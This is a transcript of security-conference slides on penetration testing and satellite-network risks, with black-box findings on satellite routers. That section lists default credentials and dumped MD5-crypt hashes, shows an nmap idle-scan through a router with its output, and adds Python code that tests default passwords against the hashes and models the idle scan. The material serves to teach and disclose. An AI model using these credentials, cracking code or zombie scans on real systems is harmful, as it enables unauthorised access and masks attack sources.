Security - SAT Expo

Transcript

IT security over cable, wireless and satellite: secrets and solutions, session II
[ PROACTIVE SECURITY AND FIELD EXPERIENCES ]
Raoul Chiesa
Founder & CTO, @ Mediaservice.net
Divisione Sicurezza Dati/DSD-LAB
Steering Committee, CLUSIT
Italian Association for Computer Security
Board of Directors member, Director of Communications, ISECOM
Institute for Security and Open Methodologies, USA
Authorized International Trainer, ISECOM
OPST & OPSA Official Certification Programs
Southern Europe Reference Member, T.S.T.F.
Telecom Security Task Force, USA, EU, ASIA
COPYRIGHT
This set of slides is protected by copyright law and by the provisions of international treaties.
Title and copyright to the slides (including, but not limited to, every image, photograph, animation, video and text) belong to the authors indicated.
The slides may be freely reproduced and used by research institutes, schools and universities under the Ministry of Public Education for institutional, non-profit purposes.
Any other use or reproduction (including, but not limited to, reproduction in print, on magnetic media or on local and public computer networks), in whole or in part, is forbidden unless explicitly authorized in writing, in advance, by the author(s).
The information contained in these slides is believed to be accurate as of the date of publication. It is provided for educational purposes only and not for use in the design of plants, products, etc.
The information contained in these slides is subject to change without notice.
The author assumes no liability for the content of these slides (including, but not limited to, the correctness, completeness, applicability and currency of the information).
In no case may conformity to the information contained in these slides be claimed.
In any case this copyright notice must never be removed and must also be reproduced in partial uses.
(C) 1996-2004 Raoul Chiesa
(C) 2002-2004 @ Mediaservice.net Srl
AGENDA
14.45 – AN INTRODUCTION TO PROACTIVE SECURITY
• The company
• The speaker
• What we do
• Our clients
• Proactive Security
• Schools & methodologies
• ISECOM’s Security Proactive Square
15.30 - IT SECURITY AND SAT COMMS: THE LINKS
• Applying Proactive Security to the world of satellite communications: a real overview
• Typical security issues
THE SATELLITE AND THE BUSINESS WORLD: A CASE STUDY ON END-USER APPLICATIONS
• Finance environments
• Editorial group environments
• Telecommunications environments
16.15 – ASSETS & PROBLEMS: HISTORICAL ISSUES AND FIELD EXPERIENCES
• Smart Card, Decoder, Router, NoC, Dealers
• Penetration Testing Case Studies
ZOOM: SAT ROUTER FIELD EXPERIENCES (BLACK BOX SECURITY TESTING)
• Router X
• Router Y
16.45 - (A THEORETICAL) CASE STUDY: SAT-OPERATOR SECURITY
• Points of attack
• Vulnerabilities: Devices, Applications, Network
• Lessons that have been learnt
SECURITY SAT-COMMS R&D: SOME RESULTS ON ROUTER SECURITY
17.15 - Q&A
THE COMPANY
• We're not a "dot-com sec-company" [Est. 1997]
• Privately owned by security professionals, no VCs
• Vendor-independent: we do not resell or (re)distribute!
• D.S.D. (Data Security Division) since 1998
• Wide background, direct experience
• Internal Tiger Team ('99)
• On-the-edge consulting expertise
• Unconventional technologies builder
• External audit team for vendors & carriers
• Strong R&D (national/international: scouting, black-box testing, distributed research, contributions to the world's security community)
• The final choice of top and large companies (Corporate, Telco, IT, Industry, Chemical, Editorial, Finance, Healthcare and P.A. environments)
• Selected third-party partnerships
THE SPEAKER
• Hacking skills started back in 1986
• From 1989 to 1995 high level hacking and phreaking
experiences
• Ice Trap operation, 1995-96: SCO/FBI, Interpol,
Criminalpol
• Co-Founder of @ Mediaservice.net in 1997 (a l0pht focus)
• Papers & articles for standard and specialized press
• Interviews with mass-media (independent point of view)
CLUSIT, ISECOM, TSTF Member of the Board
CLIENT PORTFOLIO (EXTRACT)
Arma dei Carabinieri (ROS, Central Command in Rome),
Hospital S. Giovanni Battista, Torino (Ospedale delle Molinette),
Banca Mediocredito Friuli Venezia Giulia, Bo*frost SpA, Bulgari
SpA, CNR di Milano (Security Task Force) Telecom Italia SpA
(Italy and abroad group companies), Editorial Group
“L’Espresso” (La Repubblica, Kataweb, Radio DJ, etc..),
ITC/ILO - International Training Center of the ILO (ONU),
Mirato SpA (Malizia, Clinians and Intesa brands –
pharmaceutical/chemical sector), NoiCom SpA, Pirelli SpA –
Corporate Security Department, TIM SpA, Vodafone Omnitel
SpA, University of Udine, University of Milano (DSI), UNICRI –
United Nations Interregional Crime and Justice Research
Institute (ONU), Zyxel Telecommunications Inc. (TAIWAN),
Watchguard Technologies Inc. (USA).
WHO WE ARE
• An independent team of security professionals
• 10+ years of expertise in high-level penetration testing & security consulting
• Specialized in telco and corporate environments
• Independent researchers, independent auditors
• We enjoy "impossible" missions and hard-to-solve security issues
• T.S.T.F. International Consulting Team members (40+ telecommunication operators audited in the USA, Australia, Asia and Europe)
We're not the ones who "talk", we're the ones who AUDIT, TEST, REPORT.
WHAT WE DO
• Proactive Security
(explained in detail below)
• Real-Time Security
- Secured Production Systems (Web, Mail, FTP and SMS systems)
- Defense Systems (Firewall, xIDS and Monitoring systems)
- Security Managed Services
- S.O.C.
• Post-Attack Security
- Log Analysis
- Computer Forensics
- Criminal Profiling
• Specialized Security Training
- Certified Security Classes (OPST, OPSA)
- Ethical Hacking for Corporates
- L.E.A. Security (authorities only)
• IT & TLC Security Consulting
MEDIA RELATIONSHIPS (EXTRACT)
• Magazines/Newspapers:
Apogeo Editore, Fondazione Ugo Bordoni-Telèma,
Hackers & C, ICT Security Magazine, Il Sole 24 Ore
Internet News, Internos, La Repubblica, La Stampa, Linux
& C, MAX, Mondadori My Tech, Panorama/Panorama
Web, PC Magazine Italia, Zeusnews.
• Books:
Feltrinelli, Pearson Italia, Sperling & Kupfer, Apogeo Editore: scientific supervisors and writers for the Italian editions of specialized books and manuals:
Matrix Reloaded, The Art of Deception, Security in Computing and Hacking: The Art of Exploitation.
Proactive Security I
[ a basic intro ]
PROACTIVE SECURITY: WHAT’S THIS ?!?
Proactive Security = Act BEFORE
[and sleep better at night]
WHY IS IT SO IMPORTANT?
Maybe for the consequences?
• Economic damages
• Damage to the company's image
• Theft of confidential information and reserved projects
• Legal liability (both civil and criminal)
• Resource abuse
• Violation of international practices and standards
• Revocation/suspension of certifications (ISO/BSI)
• ... you really have many reasons to care.
PROACTIVE SECURITY: from “schools”…
Yesterday we used to have different "schools":
- Automated testing (Vulnerability Scanning/Assessment)
"our scanner uses A.I. on neural networks, and everything is in HA"
- Manual testing (Ethical Hacking, Pentesting, Unconventional Security Testing)
"we've got the most advanced & up-to-date hacking techniques"
"we have the best hackers in the world (or whatever)"
"...uh, yeah, you know, we use Latvian people!"
- Security-through-Obscurity Security Testing
"...dear customer, you shouldn't care about HOW we do it, that's our job and we know how to do it, but we can't explain the 'whys' and the 'hows' to you!"
PROACTIVE SECURITY: …to “methodologies”
- Vulnerability Scanning/Assessment
- Security Scanning
- Penetration Testing
- Risk Assessment
- Security Auditing
- Ethical Hacking
- Posture Assessment & Security Testing
DECISIONAL FACTORS:
• Execution costs
• Execution timings
DISTINCTION FACTORS:
• Applied methodology
• Repeatability of the tests and the possibility of comparison
• Numeric classification of the "risk values"
• Compliance with standards and legislation (ISO/BSI, privacy laws, company policies, ...)
The PROs and the CONs
• Automated (Vulnerability Scanning, Security Testing)
• Hand-made (Penetration Test, Ethical Hacking)
The first methodology is based on the quality of the security-testing tool (a product); it's not that easy to reproduce the technical skill and motivation of an attacker... Would a hacker ever buy a piece of software to attack your company?
We suggest the use of automated tools in order to plan cyclic internal Vulnerability Assessments, but they cannot be a serious way to take a real snapshot of the existing situation and of the effective technical risk level.
The second technique produces the best results, but the tests must be executed by a Tiger Team with huge and proven expertise and skills.
TODAY: THE PROACTIVE SECURITY SQUARE
Proactive Security II
[ Know Your ENEMY ]
KNOW YOUR ENEMY: HACKER’S PROFILING
PSYCHOLOGICAL PROFILE and DANGEROUSNESS LEVEL
Wannabe Lamer: NULL (I'd like to be a hacker, but I can't...)
Script Kiddie: LOW (the script boy)
Cracker: HIGH (burned ground, the Destroyer)
Ethical Hacker: MEDIUM (the "ethical" hacker's world)
Quiet, paranoid, skilled hacker: MEDIUM (the very specialized and paranoid attacker)
Cyber-Warrior: HIGH (the soldier, hacking for money)
Industrial Spy: HIGH (industrial espionage)
Government agent: HIGH (government agents: CIA, Mossad, FBI, etc.; The Cuckoo's Egg docet)
KNOW YOUR ENEMY: TARGETS
PSYCHOLOGICAL PROFILE and TARGET
Wannabe Lamer: end-users (I'd like to be a hacker, but I can't...)
Script Kiddie: SMEs / specific security flaws (the script boy)
Cracker: big companies / PA / finance / telco (burned ground, the Destroyer)
Ethical Hacker: vendors / system integrators / telcos (the "ethical" hacker's world)
Quiet, paranoid, skilled hacker: big companies / PA / finance / telco / R&D (the very specialized and paranoid attacker)
Cyber-Warrior: "symbol" multinationals (the soldier, hacking for money)
Industrial Spy: multinationals, ICT companies (industrial espionage)
Government agent: multinationals / governments (government agents: CIA, Mossad, FBI, etc.; The Cuckoo's Egg docet)
Attack tools have grown up; intruders' skills have gone down!
BACK !
THE PROACTIVE SECURITY SQUARE
SECURITY TESTING: HOW IT WORKS
OK, what's in these "verification actions"?
Using different actions of Vulnerability Scanning, Penetration Testing or attacks via Ethical Hacking, we put in place proactive verification systems, useful for pointing out weaknesses in the target systems, environments or network.
Deep Inside
EXTERNAL
INTERNAL
FROM THE EXTERNAL
Public Networks
• Leased TCP/IP lines
(CDN/CDA/ADSL/HDSL/F.R.)
• Packet Switching lines
(CDN or Frame Relay)
• Telephone lines (PSTN/ISDN)
• Satellite lines (mono/bidirectional)
• Mobile (GSM, GPRS, 3G)
FROM THE INTERNAL
• INSIDER ABUSE PROFILE
• INTERNAL L.A.N.
(via RAS or on-site)
• LAN-to-LAN PtP
• LAN-to-LAN Public
• LAN-to-LAN VPN
Private Networks with public gateways
• INTERNET linked
• Point-to-Point
• X.25/X.121
• DECnet
• SNA
• Dialin/Toll free access numbers
• RAS
• Supplier gateways: SAP, trusted suppliers, trusted gateways, etc.
WHY HIRING AN EXTERNAL TIGER TEAM ?
• You obtain an objective and impartial test of your data infrastructure
• External T.T.s often use unconventional verification techniques, beyond the classic verification methodologies
• Already knowing your IT systems = conflict of interest + useful information for the attacks (e.g. are the private IP ranges 10/8 or 192.168/16?)
• The company's preconceptions could influence a "home-made" security test (blind-spot issues)
• Third-party confirmation provides guarantees to insurance and financial partners, as well as to customers.
CONSULTANT SELECTION: COMPANY OR FREELANCE ?
Single freelance:
• OK! He costs less: (apparent) money savings.
• NOT OK... he does not have the equipment, skills and infrastructure available to execute large-scale jobs or attacks on specific media (e.g. RAS, PBX, X.25, operating systems other than Microsoft, Linux, Sun).
• compromise #1: problems with availability, immediate response, target size;
• compromise #2: lower-profile tests, low visibility on the targets;
• compromise #3: 3 heads work better than 1, we all know this: if this leads to vulnerabilities being missed, it means a false sense of security on the client's side.
OPERATING SYSTEMS TESTED IN +10 YEARS
- AOS/VS
- BBS Systems
- Bull PAD
- CICS/VTAM
- Cisco IOS
- CDC NOS – Control Data Corporation
- DEC VAX/VMS and AXP/OpenVMS
- DEC Ultrix
- DEC Terminal Decserver
- DG/UX (Data General AViiON)
- DOS
- DRS/NX
- GS/1
- HP 3000
- HP/UX 9000
- IBM Aix
- IBM OS/400 (AS/400)
- Northern Telecom PBXs
- IRIX SGI
- VM/370
- PACX/Starmaster (Starmaster Gandalf)
- Pick Systems
- PRIMOS Prime Computer
- RSTS
- SCO
- Shiva LAN Router
- Sun Solaris
- TOPS 10/20
- Unknown systems
- VCX Pad
- VM/CMS
- IRIS Operating System (PDP and others)
- XENIX
- Linux
- Motorola XMUX (Gandalf)
- WANG Systems
MAIN CHECKS AND TESTS
Policies (External/Internal)
Passwords
Operating System (OS) Bugs
Applications Bugs
….
OUR METHODOLOGY APPROACH
ATTACK PHASES
Information Gathering
The goal of this phase is to obtain all the available information about the target, using public sources and tools.
Services Scanning
In this second phase, the goal is to obtain all the available information about the active services on the target machine(s), as well as their versions and releases.
Security Flaws Identification & PoC/Attack Phase
The goal here is to penetrate the target system(s) and obtain, whenever possible, full operating privileges on the machine; to demonstrate the theorized vulnerabilities; and to produce a Proof of Concept using specific or "on-the-fly coded" exploits.
Target Session
The fourth phase of the security verification process looks for information and trends on the target system itself; we also look for previous (unknown) break-ins or intrusions and we try to define and understand the management and administration level of the target box.
Security Report
The final Security Report contains: Executive Summary, Technical Summary, Attack Sessions, Evidence, as well as Tested Environment specifications, assigned Technical Risk Level, Suggestions and final Conclusions.
BACK AGAIN
THE PROACTIVE SECURITY SQUARE
VULNERABILITY ASSESSMENT (SCANNING)
THE PROACTIVE
SECURITY SQUARE (1/7)
YOU ARE
HERE
• Level 1 in the Security Testing Quality standards
• Automated tests
• English-language reports that "fit everybody"
• High number of false positives/negatives (fake alerts, a fake "security sensation")
• It only cares about the "IP" world
SECURITY SCANNING
THE PROACTIVE
SECURITY SQUARE (2/7)
YOU ARE
HERE
• Level 2 in the Security Testing Quality standards
• Automated scans, manual verification
• Final report in Italian and English
• Manual tuning of the false positives and negatives
• Still limited to the IP areas
PENETRATION TESTING
THE PROACTIVE
SECURITY SQUARE (3/7)
YOU ARE
HERE
• Level 3 in the Security Testing Quality standards
• Verification actions executed manually, following proprietary methodologies (the pentester's personal background or the attack team's specific know-how)
• The final report is written directly by the executing Tiger Team and is delivered in Italian (or other languages) to the final customer
• Special testing services can optionally be bundled, such as Social Engineering, Trashing, Physical Intrusion, Web Application Security Testing, black-box penetration test, etc.
• It does not stop at the "IP" world (RAS, X.25, DECnet, WiFi, Web, etc.)
• The execution time grows with each single tested asset
RISK ASSESSMENT
THE PROACTIVE
SECURITY SQUARE (4/7)
YOU ARE
HERE
• Level 4 in the Security Testing Quality standards
• Evaluation and correlation actions on the data mined from the testing operations and on the company's risk values
• Results can be generated from the 3 previous technical analysis methodologies
• It needs a long execution time
• If the technical testing results are somehow "false", the whole risk analysis will pay the consequences (and the economic investment as well!)
SECURITY AUDIT
THE PROACTIVE
SECURITY SQUARE (5/7)
YOU ARE
HERE
• Level 5 in the Security Testing Quality standards
• Auditing actions, typically from the internal environment, of the whole IT infrastructure: the analysis looks at the design, procedural and implementation points of view and at security issues, exposures and flaws.
• It is executed manually, with a strongly customized final report based on the client's effective needs, also taking into consideration specific assets or company businesses.
• It can be the final result of proactive security methodologies, married with standard risk analysis methodologies (CRAMM, etc.)
ETHICAL HACKING
THE PROACTIVE
SECURITY SQUARE (6/7)
YOU ARE
HERE
• Level 6 in the Security Testing Quality standards
• 360-degree verification attacks, aimed at specific assets, services or infrastructures
• It requires FULL OPERATING AUTHORIZATION + a "Free to Jail" letter (a get-out-of-jail-free letter, needed for the special options at point #3)
• It is executed using unified actions of:
1. Penetration Testing (IP, xSDN, X.25/X.121, SAT, WiFi, Web Applications, ...)
2. Phreaking
3. Social Engineering, Physical Intrusion, Trashing
4. Reverse Engineering
5. Black Box Penetration Testing
CERTIFIED POSTURE SECURITY ASSESSMENT
THE PROACTIVE
SECURITY SQUARE (7/7)
YOU ARE
HERE
• Top level (7th) in the Security Testing Quality standards
• Repeated verification and matching actions (follow-up), executed in a time-frame defined and agreed with the client
• The analyses are based on initial knowledge factors (expressed in the vulnerability analysis generated from the previous testing actions) and are executed in full respect of the OSSTMM methodology (repeat and compare is possible, saving time & money!) and of its RAVs, Risk Assessment Values
• The final report is generated manually by the Tiger Team, in the client's language, and is compliant with international guidelines and standards such as ISO/BSI, GAO, FISCAM
• The Security Report is OSSTMM Certified
Proactive Security
&
SAT Security
[ the dangerous relationships ]
THE PROBLEM
• The main telecommunications vendors (Nokia, Ericsson, Alcatel, etc.) are selling insecure software and systems to telcos.
• Telecommunications operators have a very poor understanding of security issues.
• Based on 5 years of penetration testing experience, TLC operators are the most vulnerable of all industry groups.
• Sophisticated hackers have an increased interest in telco security, communications and VAS hacking.
• In the SAT environment the facts are even worse: no one has ever cared about Proactive Security.
• Content resale (movies, shows, sit-coms, etc.) is moving to H.323 and other IP-based protocols.
THE VENDORS
• Some vendors have decided to take an active stance on security (e.g. Nokia on GPRS, @stake security advisories); however such initiatives are isolated and do not address most TLC security problems.
• Most vendors sell antiquated software full of bugs, running old and unpatched versions of operating systems and daemons.
• Operators cannot fix the identified security weaknesses because it would void their warranty.
• In recent years vendors have discovered Linux as a good operating system for embedded applications: the security aspects are usually "forgotten".
• The result of this "head in the sand" approach is an increase in the threat: critical infrastructures are at risk.
THE TLC OPERATORS
• Operators rely on vendors for secure solutions.
• Operators are primarily focused on network operations, software upgrades, network performance and other time-consuming routine tasks.
• Operators lack in-house expertise on TLC security and hacking.
• Operators are usually divided between the IT and Engineering departments, creating two separate security domains.
• Most operator networks are open to hackers.
THE PARADIGM
• Two different worlds, IT and Engineering
• Very different priorities
SOME NUMBERS
Based on a 5-year study encompassing 21 network operators:
• 100% could be hacked from the Internet
• 90% could be hacked through PSTN, X.25 or ISDN
• 72% had a security incident in the last 2 years
• 23% had appropriate perimeter security controls
• 0% had all their mission-critical hosts secured
• 0% had comprehensive database security in place
• 0% had integrity measures protecting billing data
THE ENEMY
SAT fraud is still an attractive target:
• Cloning smart-cards.
• Bypassing tolls, getting services without fees, setting up premium subscriptions, etc. (web hacking, operator hacking).
• Privacy invasions: interception of call-related data (e.g. contents, signalling data, billing data) via device or Internet hacking.
• Unauthorized access: illegal access to the broadcasting centre and the IT back-office.
• Recently one underground group announced it was reverse engineering Nokia software.
• Groups of sophisticated hackers are working on abusing many sat-decoders running embedded Linux.
• A US-based research group is working on a "secure decoder".
THE COMPETITION
• Traditional security shops: no knowledge of TLC-specific issues, poor understanding of security procedures.
• Traditional TLC consultancies: very poor knowledge of security issues.
• "Big 5" audit firms: focused on policies, no real expertise (they outsource their jobs to people like us).
• In-house resources: very dangerous. Internal fraud overlooked. Interdepartmental ego problems. Good security and bad security look the same.
DOING NOTHING…
• … with your sat and tlc infrastructures
today is like doing nothing with your
Internet hosts in the 90’s.
• It is an invitation for upcoming disasters.
TYPICAL SECURITY ISSUES
INTERNET LINK:
Firewalls not updated/managed
Lack of security policies
Errors in the secure network design (DMZ, direct access to internal hosts, "bridge" systems not in a secured area)
PSTN/ISDN LINKS:
Unattended access gateways (RAS, ISDN backup on routers, ...)
Missing hardening on RAS devices
Default passwords
Same phone numbers both for end-users (Pay-TV via xSTN) and IT management
SAT LINK:
Insecure SAT devices (SAT IP routers)
Missing hardening on SAT devices
Internal exploitation, interception of passing data
END-USER APPLICATIONS & ASSETS
• FINANCE ENVIRONMENT: stock-exchange data download
• PRESS ENVIRONMENT: news from the agencies
• TLC ENVIRONMENT: Internet connectivity
ASSETS:
Smart Card/JAVA Card: clonable, breakable, reversible
Sat Decoder (STB): easy to crash, RS-232 console
Sat Router: we'll discuss this later ☺
Centre of Broadcasting: hackable
Dealers: the weakest part of the chain
A THEORETICAL CASE STUDY: CoB ATTACK
[Diagram: LAN 1 with a SIT and LAN 2 with a SIT]
A THEORETICAL CASE STUDY: CONTACT POINTS
When talking about IT security, we must NOT forget that attackers don't use "just the Internet". The contact points to consider:
• Process Security
• Physical Security
• Information Security
• Communications Security
• Internet Security
• Wireless Security
A THEORETICAL CASE STUDY: Internet Presence
[Diagram of the operator's Internet presence: ADMIN, INTRANET, DMZ, NEWS, ISP, NSI, SATELLITE OFFICE, MOBILE OFFICE. Blue is considered under control; red is in third-party control; yellow is third-party where some control can be maintained.]
A THEORETICAL CASE STUDY: Attack Points
[Same diagram with the attack points marked: ADMIN, INTRANET, DMZ, NEWS, ISP, INTERNIC, SATELLITE OFFICE, MOBILE OFFICE. Note the traditional defense points, and note what a hacker can attack to cause damage.]
LET'S PLAY IT AS A "MOBILE TELCO"...
[Diagram: GSM Architecture / GSM Operations, the whole back-office of a mobile operator drawn as interconnected systems. Labels recoverable from the slide:
- Network elements: MSC, HLR, AuC, SGSN, GGSN, IN Platform, WAP, SMSC, VMS, IVR, ISCP, Billing gateway (BGW), Service activation gateway (SOG).
- Billing and customer data: Billing System & Golden Database (customer and service administration, personalisation, content management, tariffing, SIM and number management, provisioning requests, call data collection, rating and billing for roaming, retail and interconnect, payment collection); Mediation System (collection and normalisation of call data, transfer of service requests to the GSM network); rated, unrated and pre-pay CDRs; TAP Clearing House for roaming call data; customer and subscription data with real-time billing; Bad Debt Database (blacklist?); SIM, IMSI and MSISDN numbers, including IMEI blacklisting.
- Payments and credit: BANK interface, card payments and authorisation, DD payments and returns, E-Wallet and small purchases (EFT), external billing for content supply, Credit Check (ID and address validation, normalised address, credit scoring, result of check), general ledger updates.
- Sales and logistics: SAP (sales support, logistics and finance processing, human resources, materials management), SIM manufacturer with SIM orders and dispatch, dealer codes and activation, commissions, Sales and Dealer Data Warehouse, printing, POS activation, WCS shops, retail outlets, logistics company, multiple fulfilment vendors, shops and dealers, site rental assets, Document Imaging, FRAUD system, Multimedia.
- Customer care: ACD (distributes customer calls by caller ID, service level and preferred language), IVR (identifies the customer and satisfies simple queries), CRM Tool, Case Based Reasoning (manages customer tasks to completion), diagnostic tool (diagnose problems and recommend solutions), Predictive Dialler, Electronic Queue Manager (service centre queue measurement), Operator services and directory inquiries, Scholar Knowledge System (on-line call centre reference), Portal and Interactive TV information access.
- Network engineering: GIS (site, dealer and shop info, signal strength and coverage), Radio planning tool, sites administration, BTS build, provision and transmission, operations and network fault logging.]
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
B.B. = BLACK BOX MODE when testing the security of a device
What we tested:
Broadlogic Satellite Express XLT * (DVB to Multicast Router)
SatLynx BBI Astra
ViaSat LinkStar (ComSat Laboratories)
* Now the SkyStream EMR 5000 "Edge Media Router"
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
What we found:
1) LACK of security in default accounts
Web Management Interface:
• Username: webadmin / Password: webadmin
Telnet Management Interface:
• Username: admin / Password: admin
• Username: installer / Password: installer
System Users (MD5-crypt hashes):
• root:$1$t.TUJSEP$zZHajMrk7z.OQeRarFWkn1
• bsupport:$1$tAVIaSbI$0rvfQEs85kNelM/EoWD2R.
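The two system-user entries above are in the Unix MD5-crypt ("$1$") format, so once they have been dumped an auditor can check offline whether they are the same default or trivial passwords as the web and telnet accounts. The Python below, an added example and not code from the original talk or from the tested devices, reimplements MD5-crypt with nothing but hashlib and tries a list of candidates against each entry. The candidate list is constructed here; the talk does not say what the two dumped hashes resolve to, and this script makes no claim about them.

```python
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"

# The two entries dumped from the router, exactly as printed in the talk.
DUMPED_ENTRIES = [
    "root:$1$t.TUJSEP$zZHajMrk7z.OQeRarFWkn1",
    "bsupport:$1$tAVIaSbI$0rvfQEs85kNelM/EoWD2R.",
]

# Constructed candidate list: the device's own default logins plus the usual suspects.
DEFAULT_CANDIDATES = ["", "root", "bsupport", "admin", "installer", "webadmin", "password"]


def md5crypt(password: bytes, salt: bytes) -> str:
    """Unix MD5-crypt ("$1$") as FreeBSD/glibc crypt(3) computes it; salt is at most 8 bytes."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                       # one slice of the alternate digest per 16 bytes
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    i = len(password)
    while i:                                   # the historic "length bit" quirk
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                      # 1000 stretching rounds
        rnd = hashlib.md5(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    out = bytearray()                          # crypt(3)'s own base64 over 24-bit groups
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return (MAGIC + salt + b"$" + bytes(out)).decode()


def split_entry(entry: str):
    """'user:$1$salt$hash' -> (user, salt, full hash string)."""
    user, full = entry.split(":", 1)
    fields = full.split("$")
    if len(fields) != 4 or fields[1] != "1":
        raise ValueError("not an MD5-crypt hash: " + full)
    return user, fields[2], full


def check_candidates(entry: str, candidates):
    """First candidate whose MD5-crypt with the entry's salt equals the entry, else None."""
    _user, salt, full = split_entry(entry)
    for cand in candidates:
        if md5crypt(cand.encode(), salt.encode()) == full:
            return cand
    return None


def audit(entries, candidates=DEFAULT_CANDIDATES) -> dict:
    """Map each user to the matching candidate (or None) so the finding is reproducible."""
    return {split_entry(e)[0]: check_candidates(e, candidates) for e in entries}


if __name__ == "__main__":
    for user, hit in audit(DUMPED_ENTRIES).items():
        print(f"{user}: {'password = ' + repr(hit) if hit is not None else 'no default match'}")
```

The salt is taken from the entry itself, so a hit means the password is genuinely that candidate and not a collision on a different salt; a miss only means it is not in the list.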
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
What we found:
2) Insecure and badly written web applications (CGIs, etc.)
Very common (and well-known) secure programming issues were found on all the tested devices.
What we found:
3) Proven possibility of abusing the device to launch attacks against other hosts (extracts from the original report follow...)
The device we tested has a problem in its TCP/IP stack: the IP ID field of its packets is incremental, so a hypothetical attacker can use the system as a "bridge" to launch port scans (zombie scan).
This can be done even without direct access to the system. A practical example is shown below: in this case, had an IDS or a port-scan detection system been present on the network, the source address seen would not have been the attacker's but that of router XXXXX (with the obvious legal consequences, also under current Italian legislation).
Further information on this vulnerability can be found at: http://www.insecure.org/nmap/idlescan.html
ZOOM: SAT ROUTER'S B.B. SECURITY TESTING
We now give a practical demonstration of the above, launching a port scan against IP 10.200.8.12 using 10.200.8.7 (router XXXXXX, under "ZombieScan") as the apparent source IP.
root@Slap[~]: nmap -sI 10.200.8.7 -p 1,12,22,80,443,21 10.200.8.12
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-09-08 11:18 CEST
Idlescan using zombie 10.200.8.7 (10.200.8.7:80); Class: Incremental
Interesting ports on 10.200.8.12:
(The 3 ports scanned but not shown below are in state: closed)
Port       State    Service
21/tcp     open     ftp
80/tcp     open     http
443/tcp    open     https
Nmap run completed -- 1 IP address (1 host up) scanned in 3.597 seconds
root@Slap[~]:
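The "Class: Incremental" line in the nmap output is the whole precondition of the idle scan, and it is a check a vendor or auditor can make before an attacker does. The Python below, an added example and not part of the original report, does two things offline: classify_ipid() sorts a sequence of IP ID values sampled from one host into the same classes nmap uses for a zombie candidate (incremental, broken little-endian incremental, all zeros, constant, randomized), and idle_scan_probe() models one idle-scan round against a host whose IP ID is a global counter, which is why an incremental counter leaks the target's port state. The sampled ID sequences are constructed, not captured from the routers in the talk; the real scan needs raw sockets and nmap -sI as shown above.

```python
from typing import Dict, Sequence


def classify_ipid(samples: Sequence[int]) -> str:
    """Classify IP ID values read from consecutive replies of a single host.

    Mirrors the classes nmap reports for an idle-scan zombie. Only the
    'Incremental' and 'Broken little-endian incremental' classes make a host
    usable as a zombie, because only then can the attacker predict the next ID.
    """
    if len(samples) < 3:
        raise ValueError("need at least three samples")
    if all(s == 0 for s in samples):
        return "All zeros"
    deltas = [(b - a) & 0xFFFF for a, b in zip(samples, samples[1:])]
    if all(1 <= d <= 5 for d in deltas):          # small positive steps, modulo 2^16
        return "Incremental"
    swapped = [((s & 0xFF) << 8) | (s >> 8) for s in samples]   # some stacks byte-swap the ID
    sw_deltas = [(b - a) & 0xFFFF for a, b in zip(swapped, swapped[1:])]
    if all(1 <= d <= 5 for d in sw_deltas):
        return "Broken little-endian incremental"
    if all(d == 0 for d in deltas):
        return "Constant"
    return "Randomized"


class ZombieStack:
    """Minimal model of a host whose IP ID is one global 16-bit counter."""

    def __init__(self, ipid: int = 0):
        self.ipid = ipid

    def send(self) -> int:
        """Every packet the stack emits takes the next ID."""
        self.ipid = (self.ipid + 1) & 0xFFFF
        return self.ipid

    def receive_rst(self) -> None:
        """An unsolicited RST is silently dropped: no packet sent, no ID consumed."""

    def receive_syn_ack(self) -> None:
        """An unexpected SYN/ACK is answered with a RST, which consumes one ID."""
        self.send()


def idle_scan_probe(zombie: ZombieStack, target_port_open: bool) -> str:
    """One idle-scan round: probe the zombie, spoof a SYN to the target, probe again."""
    # 1. Attacker sends a SYN/ACK to the zombie; the zombie answers RST with its current ID.
    before = zombie.send()
    # 2. Attacker sends a SYN to the target port with the zombie's address as source.
    if target_port_open:
        zombie.receive_syn_ack()   # target answers SYN/ACK to the zombie, zombie sends RST
    else:
        zombie.receive_rst()       # target answers RST (or nothing), zombie stays silent
    # 3. Attacker probes the zombie again; a jump of 2 means the zombie sent a packet in between.
    after = zombie.send()
    delta = (after - before) & 0xFFFF
    return "open" if delta >= 2 else "closed|filtered"


def idle_scan(zombie: ZombieStack, target_ports: Dict[int, bool]) -> Dict[int, str]:
    """Scan several ports through the same zombie, as nmap -sI does port by port."""
    return {port: idle_scan_probe(zombie, is_open) for port, is_open in target_ports.items()}


if __name__ == "__main__":
    # Constructed samples: what three consecutive RSTs from the tested router would look like.
    print(classify_ipid([4096, 4097, 4098, 4099]))
    print(idle_scan(ZombieStack(4099), {21: True, 22: False, 80: True, 443: True}))
```

A stack that randomizes the IP ID (or uses a per-destination counter) is not a usable zombie, which is the fix the report asks the vendor for; until then, the device's ID also lets anyone on the path count how many packets it sends between two probes.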
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
What we found:
4) "Default" SNMP community (public, private)
Some of the tested devices had SNMP capabilities. In all cases, the SNMP communities in use were the "default" ones.
(extract from the final reports)
"In general on all the tested SITs it is possible to gain access to a number of system information items, but on a particular SIT it was possible to use the default SNMP community (which cannot be modified) to gain access to detailed system information, such as the satellite coordinates."
